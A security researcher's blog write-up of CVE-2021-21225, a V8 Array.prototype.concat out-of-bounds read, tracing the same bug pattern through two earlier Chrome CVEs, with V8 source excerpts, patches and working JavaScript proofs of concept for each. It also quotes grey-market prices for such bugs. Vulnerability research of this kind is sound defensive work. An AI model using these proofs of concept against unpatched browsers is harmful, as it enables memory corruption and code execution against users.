
A Bug's Life: CVE-2021-21225

Summary

In this post, I want to showcase CVE-2021-21225, a vulnerability in V8's Array.prototype.concat implementation that I discovered in April 2021. It was used to gain code execution in Google Chrome's renderer process and won a $22,000 bounty from Google, which was donated to the EFF (matched by Google). The bug itself has quite an interesting history and ticks all the boxes of a powerful V8 engine vulnerability, with the usual perks of a bug in a V8 builtin: it works in pdfium, web workers, and JIT-less environments.

Checking the "grey" markets (publishing with explicit permission of the buyers) for this bug and two other bugs (update: crbug.com/1260109 & crbug.com/1307610), the prices ranged anywhere from $350k to $500k each if provided with a reliable enough exploit that they could work with, with most of the payouts being an upfront bonus of N% followed by quarterly payouts contingent on the bugs lasting.


I thought this post would also be a good opportunity to write about a few V8 exploitation techniques that I haven't seen in public exploits (you can find these techniques in Part 2 of this writeup here):
  1. How to easily disable JIT W^X at runtime [ref]
  2. How to leak the pointer compression isolated root value [ref]
  3. How to survive Object::ToNumber(fakeObj)
  4. How to write a GC resistant addrOf [ref] with LargeObjectSpace arrays

Ode to Weirdness

V8's implementation of Array.prototype.concat is a complex state machine that has produced a large number of vulnerabilities over the years. Looking at the implementation, it's easy to understand why: the function can take an arbitrary number of arguments and those arguments can be of any type. So Array.prototype.concat needs to handle every single edge case that comes with concatenating two "arrays". Here's a call to Array.prototype.concat with only Arrays as input:
var a1 = [1,,3];
a1.__proto__[1] = 2;
var a2 = []; 
var a3 = [6, 5];
a2.length = 1;
a2.__defineGetter__(0, function() { 
    a1[1] = 2; a3.reverse(); return 4;
});
console.log(a1.concat(a2, a3)); // >>> [1, 2, 3, 4, 5, 6]
and it handles all of these cases and more: Symbol.species [ref], Symbol.isConcatSpreadable [ref], "fast" Array types [ref], "Slow" Array types [ref], and other objects that aren't Arrays [ref].
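
As a small illustration of one of those edge cases, here is a sketch of how Symbol.isConcatSpreadable changes what concat does with an argument. The variable names are made up for the example; the behaviour is what the ECMAScript spec describes for Array.prototype.concat.

```javascript
// An array-like object is appended as a single element by default...
const arrayLike = { length: 2, 0: "a", 1: "b" };
const appended = [1].concat(arrayLike);
console.log(appended.length); // 2

// ...but is spread element by element once it opts in.
arrayLike[Symbol.isConcatSpreadable] = true;
const spread = [1].concat(arrayLike);
console.log(spread); // [ 1, 'a', 'b' ]

// A real Array can opt out and is then appended as a nested array.
const optOut = [2, 3];
optOut[Symbol.isConcatSpreadable] = false;
const nested = [1].concat(optOut);
console.log(nested.length); // 2
```

Every one of these lookups is another property read that concat has to perform on user-controlled objects before it can copy a single element.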

State machines this complex are a common target for security researchers who enjoy reviewing code for vulnerabilities that might be multiple levels of abstraction deep. If you happen to enjoy reading about this style of bug, you might also consider reading these writeups [comex]. However, the complexity of the spec, which leads to primitives that move state machines into "weirder" states, is only half the story. The other variable that security researchers use when evaluating interesting targets is naturally the number of "weirder" states in the state machine. These "weirder" states in V8 are almost always states that lead to memory corruption. Weirdness can compound: one small vulnerability that moves the machine from one state to a "weirder" state can be used to create an even "weirder" state, which will eventually lead to memory corruption. Hopefully this makes sense by the end of this writeup, but I hope one takeaway is that vulnerability researchers often audit state machines and not only "source" to "sink" (which is obviously a smaller subset).

History

There is a history behind CVE-2021-21225 that tells a tale of how changes to the TC39 standard (the JavaScript spec all major JS engines follow) can cause vulnerabilities in scripting engines [ref: Natalie Silvanovich]. CVE-2021-21225 is an out-of-bounds read vulnerability in Array.prototype.concat that leads to code execution. However, the commit that introduced this vulnerability didn't make any changes to the underlying implementation of Array.prototype.concat. There have been no significant changes to the implementation of Array.prototype.concat in the past five years.

The TC39 spec change that introduced this vulnerability is rather innocuous and simply makes TypedArray elements configurable.



TL;DR: this statement no longer throws an exception.
var u32 = new Uint32Array(64);
Object.defineProperty(u32, 1, { configurable: true });
You may ask, how did a change this simple to the TypedArray spec cause an out-of-bounds read in Array.prototype.concat? The stars have been aligning to make this vulnerability for over seven years. To understand how it came into existence, it's worth looking at two other snapshots in Chrome's history when triggering this same vulnerability was possible: CVE-2016-1646 and CVE-2017-5030.

Root Cause Analysis: CVE-2016-1646

Within Array.prototype.concat's implementation there is logic that iterates over each element of every object passed to Array.prototype.concat and stores those elements to a final concatenated array. It's one of the largest and most complex builtin functions in the V8 codebase and is all still implemented in C++, so I'll break it up into chunks:

// JavaScript code
var result = [1,2,3].concat([4, 5, 6]);

----------------------------------------
// C++ implementation of the JavaScript code above

/* [1] `visitor` is the object to be returned by concat. 
   `visitor` == `result` variable in JavaScript above   */
ArrayConcatVisitor visitor(isolate, storage, fast_case);
  
// [2] Iterate over every argument, then iterate
// over their elements.
for (int i = 0; i < argument_count; i++) {
  Handle<Object> object = args->at(i);
  IterateElements(isolate, object, &visitor);
}
...
1. visitor is allocated. It is the object that Array.prototype.concat writes all of the elements of the input arrays to and then returns.

2. This for loop iterates over each argument passed to Array.prototype.concat. On each iteration it passes an argument to IterateElements, which iterates over that argument's elements.



bool IterateElements(Isolate* isolate, Handle<JSReceiver> receiver,
                     ArrayConcatVisitor* visitor) {
    // [3]
    Handle<JSObject> array = Handle<JSObject>::cast(receiver);

    // [4]
    int length = static_cast<uint32_t>(array->length().Number());

    // [5]
    switch (array->GetElementsKind()) {
    ...
}
3. Store the input array from the arguments into the variable array.
4. Store the length of the input array in the variable length.
5. Checks the Type of the array with GetElementsKind. Arrays can have a few different types that all need to be handled differently. For example, arrays that only hold double elements, [1.1, 2.2, 3.3], will be type FAST_DOUBLE_ELEMENTS.


  // [5]
  switch (array->GetElementsKind()) {
    case FAST_DOUBLE_ELEMENTS: {
      // [6]
      Handle<FixedArray> elements(FixedArray::cast(array->elements()));

      // [7]
      int fast_length = static_cast<int>(length);
      
      // [8]
      FOR_WITH_HANDLE_SCOPE(isolate, int, j = 0, j, j < fast_length, j++, {
        ...
      });
  }
6. Cache the Array's elements pointer in the variable elements, which points to the array's contents.
7. Cache the length of the array in fast_length.
8. Iterate from 0..fast_length


    // [8]
    FOR_WITH_HANDLE_SCOPE(isolate, int, j = 0, j, j < fast_length, j++, {
      
      // [9]
      Handle<Object> element_value(elements->get(j), isolate);

      // [10]
      if (!element_value->IsTheHole(isolate)) {
        if (!visitor->visit(j, element_value)) return false;
      } else {
        // [11]
        ASSIGN_RETURN_ON_EXCEPTION_VALUE(
            isolate, element_value,
            JSReceiver::GetElement(isolate, array, j), false);
        if (!visitor->visit(j, element_value)) return false;
      }
    });
9. Read the jth element from the array's contents using elements->get(j).
10. If the value read by elements->get(j) is not a Hole (i.e. is not empty), store it to the result object with visitor->visit.
11. If the value read by elements->get(j) is a Hole (i.e. the element is empty, as in [1, 2, /* hole */, 4]), use JSReceiver::GetElement to traverse array's prototype chain in search of a value. Store whatever is found to the result array with visitor->visit.


A quick note on how the V8 engine accesses a JavaScript Array's elements: V8 generally has two ways of doing things, slow and fast. The fast-operations access memory directly and the slow-operations use the V8 interpreter itself to access elements using the same underlying APIs that make the JavaScript code var array=[1, , 3]; array[1]; possible. elements->get is a fast-operation, i.e. it reads directly from memory, and if it reads outside of the array's length it will cause undefined behavior and return arbitrary memory contents. JSReceiver::GetElement, on the other hand, is a slow-operation, i.e. it will walk up prototype chains [ref], throw exceptions, call getters/setters [ref], return undefined if reading out-of-bounds, and do anything else you can think of when accessing an index from JavaScript. Let's take a look at that for loop again with this in mind:
    FOR_WITH_HANDLE_SCOPE(isolate, int, j = 0, j, j < fast_length, j++, {
      // [A] fast-operation
      Handle<Object> element_value(elements->get(j), isolate);

      if (!element_value->IsTheHole(isolate)) {
        if (!visitor->visit(j, element_value)) return false;
      } else {
        // [B] slow-operation
        ASSIGN_RETURN_ON_EXCEPTION_VALUE(
            isolate, element_value,
            JSReceiver::GetElement(isolate, array, j), false);
        if (!visitor->visit(j, element_value)) return false;
      }
    });
The issue here is that the JSReceiver::GetElement abstraction not only traverses prototype chains for values but will also trigger getter/setter callbacks if any exist on the prototype chain. Those callbacks can contain user-controlled JavaScript. Meaning that at [B] we can execute any JavaScript we want.
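
To make the slow-operation semantics concrete, here is a minimal sketch in plain JavaScript of what a hole lookup does from script. The names holey, protoWithGetter and calls are made up for the example. It only illustrates the observable behaviour, not V8's internals.

```javascript
const calls = [];

// A prototype that answers index 1 with an accessor instead of a data value.
const protoWithGetter = Object.create(Array.prototype);
Object.defineProperty(protoWithGetter, 1, {
  get() {
    calls.push("getter ran"); // arbitrary script runs here
    return "from prototype";
  },
});

const holey = [1, , 3]; // index 1 is a hole
Object.setPrototypeOf(holey, protoWithGetter);

console.log(holey.hasOwnProperty(1)); // false
console.log(holey[1]);                // from prototype
console.log(holey[10]);               // undefined
console.log(calls.length);            // 1
```

Reading the hole is enough to run the getter, which is exactly the hook that the callback at [B] gives an attacker.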

This turns out to not be an ideal state of affairs for the V8 JavaScript engine, especially for this for loop. In our malicious callback we can change the length of the array with array.length = 1; and trigger a garbage collection cycle by allocating a lot of memory with new ArrayBuffer(0x7fe00000). During this garbage collection cycle, the array will be re-allocated with elements of length 1. Remember, fast_length will still be whatever length the array was when it first entered IterateElements, so this for loop will continue running from 0..fast_length even though the elements' length is now 1. The memory-unsafe operation elements->get(j) will then read out of bounds and either start reading in gibberish values that are in memory after elements or cause a crash. Here's a proof of concept:
// CVE-2016-1646: Credits to [Wen Xu - Keen, Guang Gong - Qihoo360]

// [1] Allocate an array with a hole
var array = [1.1, /* hole where callback will trigger */, 3.3, 4.4];
// [2] Create a custom prototype for the array
var proto = {};
array.__proto__ = proto;

// [3] Define a getter on the array's prototype
proto.__defineGetter__(1, function() {
    array.length = 1; // change the length of the array
    new ArrayBuffer(0x7fe00000); // trigger garbage collection
    return 2.2;
});

// [4] Execute concat and print out the result object
var c = Array.prototype.concat.call(array);
console.log(c); 
// >> [1.1, 2261634.5098039214, 1.0316188778496665e+26, 
//     5969818116700211.0]
The final array returned by Array.prototype.concat contains unusual double values such as 1.0316188778496665e+26. These correspond to pointer values that were read out of bounds with elements->get(j) and stored in the result array with visitor->visit.
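
The same stale-length pattern can be modelled safely in plain JavaScript. This is only a sketch under the assumption that a cached length plus a shrinking callback is the whole story. concatModel, victim and shrinkingProto are hypothetical names, and a script-level read past the end returns undefined where the C++ code would read adjacent memory.

```javascript
// Model of the loop: the length is cached once, like fast_length.
function concatModel(array) {
  const result = [];
  const fastLength = array.length;
  let staleReads = 0;
  for (let j = 0; j < fastLength; j++) {
    // In C++ this is where elements->get(j) would read out of bounds.
    if (j >= array.length) staleReads++;
    result.push(array[j]); // may run a getter on the prototype chain
  }
  return { result, staleReads };
}

const victim = [1.1, , 3.3, 4.4];
const shrinkingProto = Object.create(Array.prototype);
Object.defineProperty(shrinkingProto, 1, {
  get() {
    victim.length = 1; // shrink the array in the middle of the loop
    return 2.2;
  },
});
Object.setPrototypeOf(victim, shrinkingProto);

const out = concatModel(victim);
console.log(out.result);     // [ 1.1, 2.2, undefined, undefined ]
console.log(out.staleReads); // 2
```

The two stale reads are the iterations that ran after the getter shrank the array; in the real bug those are the reads that return heap contents.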

The Fix

The fix uses the abstraction HasOnlySimpleElements, a function that checks if there are any getters/setters on an object or its prototype chain, to ensure that none of the input arrays will trigger JavaScript execution when JSReceiver::GetElement is called.
+ if ( !HasOnlySimpleElements(isolate, *receiver)) {
+     return IterateElementsSlow(isolate, receiver, length, visitor);
+ }

  switch (array->GetElementsKind()) {
      case FAST_DOUBLE_ELEMENTS: {
      ...
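
As a rough script-level analogue of that check, the sketch below walks an object's prototype chain and reports whether any index-like property is an accessor. hasOnlySimpleElementsModel is a hypothetical helper written for this post; V8's real HasOnlySimpleElements works on internal element kinds rather than property descriptors, so treat this purely as an illustration of the idea. It also assumes there are no Proxy objects on the chain.

```javascript
// Returns false if any object on the chain has a getter/setter on an index.
function hasOnlySimpleElementsModel(receiver) {
  for (let o = receiver; o !== null; o = Object.getPrototypeOf(o)) {
    for (const key of Object.getOwnPropertyNames(o)) {
      // Array indices are canonical uint32 strings below 2^32 - 1.
      const asIndex = key >>> 0;
      const isIndex = String(asIndex) === key && asIndex !== 0xffffffff;
      if (!isIndex) continue;
      const desc = Object.getOwnPropertyDescriptor(o, key);
      if (desc.get || desc.set) return false;
    }
  }
  return true;
}

const plainArray = [1, , 3];

const accessorProto = Object.create(Array.prototype);
Object.defineProperty(accessorProto, 1, { get() { return 2; } });
const trappedArray = [1, , 3];
Object.setPrototypeOf(trappedArray, accessorProto);

console.log(hasOnlySimpleElementsModel(plainArray));   // true
console.log(hasOnlySimpleElementsModel(trappedArray)); // false
```

An input that fails the check is routed to the slow path, which re-reads the length and never touches memory directly.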

Root Cause Analysis: CVE-2017-5030

The crux of the issue that caused CVE-2016-1646 was that callbacks could execute before the memory-unsafe operation elements->get(j), and within those callbacks the length of elements being indexed by elements->get(j) could be modified. So although the vulnerability above was patched by checking the arrays passed to Array.prototype.concat for getters/setters, if there was a different way to execute callbacks within that for loop then the vulnerability would exist once again. Enter CVE-2017-5030.

A few months after CVE-2016-1646 was fixed there were two major changes to V8: the Proxy object and Symbol.species were introduced. A combination of these two features introduced a new avenue to trigger callbacks within the for loop, this time within visitor->visit, which stores values to the result object returned by Array.prototype.concat.

Understanding Symbol.species

The first major addition to V8 after CVE-2016-1646 was Symbol.species [ref], introduced in June 2016. Put simply, Symbol.species allows objects to override their default constructor. So JavaScript builtins like Array.prototype.concat and Uint8Array.prototype.slice will now derive the class of the object they are going to return by pulling the Symbol.species symbol from their input object's constructor. I think code speaks louder than words here, so here is an example:
function CustomConstructor() {
    return new Number(5);
}

class MyArray extends Array {
    static get [Symbol.species]() { return CustomConstructor; }
}
                      
var array = (new MyArray(3)).fill(1);
console.log(array); // >>> MyArray(3) [1, 1, 1]
var return_value = array.concat(2);
console.log(return_value); 
// >>> Number {5, 0: 1, 1: 1, 2: 1, 3: 2, length: 4}

What is a Proxy object?

The second addition to V8 was the Proxy object [ref], an object that wraps another object and intercepts operations on the object it wraps. For example, this small script uses a Proxy to intercept all of the get operations on an object.
const handler = {
  get: function(target, prop, receiver) {
    return "evil";
  }
};

var a = new Proxy({}, handler);
a[0] = 5;
console.log(a[0]); // >>> "evil"
console.log(a[2]); // >>> "evil"

The Vulnerability

Let's scatter all of the puzzle pieces out on a table so we can eventually fit them together.

1. Symbol.species can be used to control the object that Array.prototype.concat returns.
2. Array.prototype.concat is still vulnerable if a callback can be triggered in the for loop.
3. The Proxy object can be used to intercept requests to an object.

Piece #1: visitor is now controlled by the user with Symbol.species

After the addition of Symbol.species in 2016, Array.prototype.concat now reads the constructor in Array[@@species] from its first argument to construct the object it's going to return.
  // [1] Read Symbol.species symbol from the first argument 
  Handle<Object> species;
  ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
      isolate, species, Object::ArraySpeciesConstructor(isolate, receiver));
  ...

  Handle<Object> length(Smi::zero(), isolate);
  Handle<Object> storage_object;
  // [2] Execution::New calls a function from the JS Engine
  ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
     isolate, storage_object,
     Execution::New(isolate, species, species, 1, &length));
  storage = Handle<HeapObject>::cast(storage_object);
  
  // [3]
  ArrayConcatVisitor visitor(isolate, storage, fast_case);
  ...
Array.prototype.concat now uses Symbol.species [1] to pull the constructor from its first argument. Then executes that constructor [2], stores the result in storage variable, and creates the visitor object with the storage variable.

Meaning that we have complete control over the object that Array.prototype.concat writes to with visitor->visit and returns:
var o = {};
class MyArray extends Array {
    static get [Symbol.species]() {
        return function() { return o; }
    }; 
}
var a = new MyArray();
console.log(Array.prototype.concat.call(a, [1, 2, 3])); 
// >>> {0: 1, 1: 2, 2: 3, length: 3}

console.log(o); 
// >>> {0: 1, 1: 2, 2: 3, length: 3}

Piece #2

Now that the visitor object is completely under our control, there is an opportunity to find instances where writing to the visitor object results in a callback running. Here is a snippet of code from visitor->visit.
V8_WARN_UNUSED_RESULT bool visit(uint32_t i, Handle<Object> elm) {
  uint32_t index = index_offset_ + i;
  ...

  if (!is_fixed_array()) {
    LookupIterator it(isolate_, storage, index, LookupIterator::OWN);
    // [1]
    MAYBE_RETURN(
      JSReceiver::CreateDataProperty(&it, elm, Just(kThrowOnError)), false);
    return true;
  }
    ...
}
Under the covers, visitor->visit is using the JSReceiver::CreateDataProperty abstraction [1] to write values from the input arrays to the result object Array.prototype.concat is going to return.

Let's have a look at JSReceiver::CreateDataProperty's callgraph:


If any of these functions that JSReceiver::CreateDataProperty calls can trigger a JavaScript callback, we can exploit it in the same way that we did in CVE-2016-1646. I can't walk through every one of these functions in this post, but looking closer we can see that there are JSProxy paths, meaning Proxy objects are handled by CreateDataProperty.

Piece #3

Taking a closer look at the call graph we see that CreateDataProperty will eventually reach the function JSProxy::DefineOwnProperty if passed a Proxy object.
Maybe<bool> JSProxy::DefineOwnProperty(Isolate* isolate, Handle<JSProxy> proxy,
                                       ...) {
  ...
  // [1]
  Handle<Object> trap;
  ASSIGN_RETURN_ON_EXCEPTION_VALUE(
      isolate, trap,
      Object::GetMethod(Handle<JSReceiver>::cast(handler), "defineProperty"),
      Nothing<bool>());
  ...
JSProxy::DefineOwnProperty looks up the "defineProperty" string on the Proxy's handler with Object::GetMethod [1]. Object::GetMethod is a slow-operation, like JSReceiver::GetElement, that will trigger getter/setter callbacks. This means that we can once again execute a callback within the IterateElements for loop in Array.prototype.concat.
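
The trap lookup is observable from script. Here is a minimal sketch (demoTarget, demoHandler and events are names made up for the example) showing that defining a property on a Proxy first reads handler.defineProperty, and that a getter sitting there runs before anything is written:

```javascript
const events = [];
const demoTarget = {};
const demoHandler = {};

// An accessor in place of the trap: it runs whenever the engine looks the trap up.
Object.defineProperty(demoHandler, "defineProperty", {
  get() {
    events.push("handler.defineProperty looked up");
    return undefined; // no trap, so the operation falls through to the target
  },
});

const demoProxy = new Proxy(demoTarget, demoHandler);
Object.defineProperty(demoProxy, 0, {
  value: 42, writable: true, enumerable: true, configurable: true,
});

console.log(events.length); // 1
console.log(demoTarget[0]); // 42
```

Returning undefined from the getter keeps the write working as if no trap existed, so the only visible effect is that our code ran in the middle of the store.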

Putting it all together

// Page 1/3 
// [1] Create a Proxy Object
var target = {};
var handler = {};
var p = new Proxy(target, handler);

// [2] return the Proxy object from Symbol.species
class MyArray extends Array {
    static get [Symbol.species]() {
        return function() { return p; }
    };
}

// [3] Instantiate our new array class
var w = new MyArray(100);
w[1] = 0.1;
w[2] = 0.1;
First, we must create an object with a custom Symbol.species that returns a Proxy object [2].


// Page 2/3 
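// handler has no defineProperty trap yet, so b_dp is undefined and the
// write falls through to target once the getter returns it
var b_dp = handler.defineProperty;
function evil_callback() {
    // [4]
    w.length = 1; // shorten the array
    gc();         // trigger gc (needs a shell started with --expose-gc)
    return b_dp;
}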
// [5]
handler.__defineGetter__("defineProperty", evil_callback);
Then we must define a getter for the string "defineProperty" on its handler [5], which will be executed when Object::GetMethod is called deep in visitor->visit. Within that getter we will shorten the length of the input array with w.length = 1 and trigger garbage collection [4].


// Page 3/3 
// [6]
var result = Array.prototype.concat.call(w);

// [7]
for (var i = 0; i < 20; i++) {
  console.log(result[i]); 
}
/*
0.1
4.763608295640895e-270
1.1162362362175e-311
1.9058130679254088e-269
4.763796148908345e-270
1.6371943681747382e-269
6.0095139738375e-309
1.9352160739915938e-269
4.7637961505155866e-270
*/

Finally, we trigger Array.prototype.concat with our custom object as the first argument [6]. After it's done executing we can read the OOB values from the result object [7].

Here's all of that in one go:
// [1] Create a Proxy Object
var target = {};
var handler = {};
var p = new Proxy(target, handler);

// [2] return the Proxy object from Symbol.species
class MyArray extends Array {
    static get [Symbol.species]() {
        return function() { return p; }
    };
}

// [3] Instantiate our new array class
var w = new MyArray(100);
w[1] = 0.1;
w[2] = 0.1;

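// handler has no defineProperty trap yet, so b_dp is undefined and the
// write falls through to target once the getter returns it
var b_dp = handler.defineProperty;
function evil_callback() {
    // [4]
    w.length = 1; // shorten the array
    gc();         // trigger gc (needs a shell started with --expose-gc)
    return b_dp;
}
// [5]
handler.__defineGetter__("defineProperty", evil_callback);

// [6]
var result = Array.prototype.concat.call(w);

// [7]
for (var i = 0; i < 20; i++) {
  console.log(result[i]); 
}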
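
A note on gc(): it is not a standard JavaScript function, and d8 and Node only define it when started with --expose-gc. The helper below is a hypothetical convenience (triggerGc is not part of the original proof of concept) that uses the exposed function when it exists and otherwise falls back to allocation pressure, in the same spirit as the new ArrayBuffer(0x7fe00000) trick from the 2016 proof of concept. Allocation pressure makes a collection likely, not guaranteed.

```javascript
// Returns a string describing which strategy was used.
function triggerGc() {
  if (typeof globalThis.gc === "function") {
    globalThis.gc(); // only available with --expose-gc
    return "exposed gc()";
  }
  // Fallback: churn through short-lived buffers to pressure the heap.
  for (let i = 0; i < 64; i++) {
    new ArrayBuffer(1 << 20); // 1 MiB each, immediately unreachable
  }
  return "allocation pressure";
}

console.log(triggerGc());
```

On a patched engine the proof of concept above is harmless either way; the helper only removes the dependency on a command-line flag.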

The Fix

The fix adds a second check guaranteeing that the result object (the object returned by Symbol.species) is a "Simple" type. Simply put, this check ensures that the result object is not a Proxy object, with the hope that this prevents callbacks from being executed within the IterateElements for loop.
+   if (!visitor->has_simple_elements() ||
       !HasOnlySimpleElements(isolate, *receiver)) {
     return IterateElementsSlow(isolate, receiver, length, visitor);
   }
   Handle<JSObject> array = Handle<JSObject>::cast(receiver);

   switch (array->GetElementsKind()) {
     case PACKED_SMI_ELEMENTS:
     case PACKED_ELEMENTS:
     case PACKED_FROZEN_ELEMENTS:
     case HOLEY_ELEMENTS: {

Root Cause Analysis: CVE-2021-21225

Now let's go back to the TC39 change that introduced CVE-2021-21225 and look at what it does.


From a web developer's perspective this means that it's possible to define configurable properties on TypedArrays:
var u32 = new Uint32Array(64);
Object.defineProperty(u32, 1, { configurable: true });
From a V8 scripting engine perspective this means that CreateDataProperty(typedArray, 0, 5) is now possible. Before this patch, when CreateDataProperty was passed a TypedArray it would throw an exception because TypedArray elements were not configurable.
VM133:1 Uncaught TypeError: Cannot redefine property: 0
    at :1:3
But with this new TC39 change it's possible. With this new attack surface in mind, let's look back at the attack surface diagram for JSReceiver::CreateDataProperty, where we see some references to TypedArrays. Maybe we can trigger a callback in there somewhere.
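
The behaviour change can be probed from script without relying on exceptions. This is a small sketch (typed is a made-up name) that uses Reflect.defineProperty, which reports a rejected definition by returning false rather than throwing:

```javascript
const typed = new Uint32Array(4);

// Ask the engine whether it accepts a configurable element definition...
const acceptsConfigurable = Reflect.defineProperty(typed, 0, {
  value: 5,
  configurable: true,
});

// ...and whether it accepts a non-configurable one.
const acceptsNonConfigurable = Reflect.defineProperty(typed, 1, {
  value: 5,
  configurable: false,
});

console.log({ acceptsConfigurable, acceptsNonConfigurable });
```

On an engine that implements the spec change, the first call should succeed and the second should be rejected; engines that predate the change should report the opposite.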


Seven functions deep in CreateDataProperty there is a call to the function Object::SetDataProperty.
Maybe<bool> Object::SetDataProperty(LookupIterator* it, Handle<Object> value) {
  ...
  // [1] if the receiver is a TypedArray
  if (it->IsElement() && receiver->IsJSObject(isolate) &&
      JSObject::cast(*receiver).HasTypedArrayElements(isolate)) {
    ElementsKind elements_kind = JSObject::cast(*receiver).GetElementsKind();
    // [2]
    if (elements_kind == BIGINT64_ELEMENTS ||
        elements_kind == BIGUINT64_ELEMENTS) {
      // [3] convert the value to be stored to a BigInt before storing
      ASSIGN_RETURN_ON_EXCEPTION_VALUE(isolate, to_assign,
                                       BigInt::FromObject(isolate, value),
                                       Nothing<bool>());
      ...
    // [4]
    } else if (!value->IsNumber() && !value->IsUndefined(isolate)) {
      // [5]
      ASSIGN_RETURN_ON_EXCEPTION_VALUE(isolate, to_assign,
                                       Object::ToNumber(isolate, value),
                                       Nothing<bool>());
      ...
    }
  }
  ...
}
Within Object::SetDataProperty there is logic to check if the object being stored to is a TypedArray [1], then if the object is a TypedArray it converts the value being stored to the object from an Object type to a numeric type ([3] for bigints, [5] for regular numbers).

As it turns out, converting from an Object to a Number in JavaScript triggers a callback.
var object = { valueOf: function() {
    console.log("callback!")
    return 5;
}};
var sum = object + 4; // Convert from Object => Integer
// >>> callback!
console.log(sum);
// >>> 9
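
The same conversion happens on a plain store into a TypedArray, which is the path that matters here. A minimal sketch (numbers, bigints and conversions are names made up for the example) covering both the Number and the BigInt branch:

```javascript
const conversions = [];

// Storing an object into a Uint32Array converts it with ToNumber.
const numbers = new Uint32Array(2);
numbers[0] = { valueOf() { conversions.push("ToNumber"); return 5; } };

// Storing into a BigInt64Array converts with ToBigInt instead.
const bigints = new BigInt64Array(1);
bigints[0] = { valueOf() { conversions.push("ToBigInt"); return 7n; } };

console.log(numbers[0]);  // 5
console.log(bigints[0]);  // 7n
console.log(conversions); // [ 'ToNumber', 'ToBigInt' ]
```

In both cases the valueOf callback runs in the middle of the element store, before the converted value is written.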

Putting it all together again

// [1] Create a TypedArray Object
let u32 = new Uint32Array(32);
u32.__defineSetter__('length', function() {});

// [2] return the TypedArray object from Symbol.species
class MyArray extends Array {
    static get [Symbol.species]() {
        return function() { return u32; }
    }; 
}

// [3] Instantiate our new array class
var w = new MyArray(100);
First, we must create an object with a custom Symbol.species that returns a TypedArray object u32 [2].

// [4] create a valueOf callback
w[1] = {
  valueOf: function() { 
    w.length = 1; // change the length
    gc(); // trigger garbage collection
    return 1;
  }
};
w[2] = 2;
Then we store an object with a valueOf callback [4] to the array so that it will be written to the resulting TypedArray u32 with visitor->visit, causing the valueOf callback to run during visitor->visit.

// [5] trigger array.concat
var c = Array.prototype.concat.call(w);
Then, of course, we trigger Array.prototype.concat with w as the first argument [5].

Here's all of that in one go:
// [1] Create a TypedArray Object
let u32 = new Uint32Array(32);
u32.__defineSetter__('length', function() {});

// [2] return the TypedArray object from Symbol.species
class MyArray extends Array {
    static get [Symbol.species]() {
        // return the TypedArray as the result object
        return function() { return u32; }
    }; 
}

// [3] Instantiate our new array class
var w = new MyArray(100);

// [4] create a valueOf callback
w[1] = {
  valueOf: function() { 
    w.length = 1; // change the length
    gc(); // trigger garbage collection
    return 1;
  }
};

// [5] trigger array.concat
var c = Array.prototype.concat.call(w);

The Final Fix

The fix this time adds the scope-level abstraction DisallowJavascriptExecution to the scope of the for loop.



DisallowJavascriptExecution is a special scope guard that will crash the V8 runtime with an assertion if JavaScript is ever executed in its scope. This means that if a callback is ever triggered in the IterateElements for loop again, the program will crash with a benign assertion. This bug is truly dead.

Security Engineering Lessons

V8's implementation of Array.prototype.concat has fascinated me for years. CVE-2017-5030 was the first browser vulnerability I ever discovered, and I came across CVE-2021-21225 four years later. What captivated me was the very weak security invariant that guarded it: "this function is not vulnerable if and only if callbacks can't be triggered while the input arrays are being processed".

Lesson: Manage Abstraction Complexity and Harden Security Invariants

Looking back, the only reason CVE-2016-1646 ever existed was the developer needed an abstraction that searched an object's prototype chain for a value and the only abstraction available with that functionality was JSReceiver::GetElement.

JSReceiver::GetElement hid tons and tons of complexity, like any good abstraction, but some of that hidden complexity, like calling getters/setters, had the potential to break security invariants. Identify these abstractions that hide tons of complexity and audit them for paths that can break security invariants. Then audit and harden the callers of those abstractions.

Exploitation

Exploitation is covered in Part 2 of the writeup.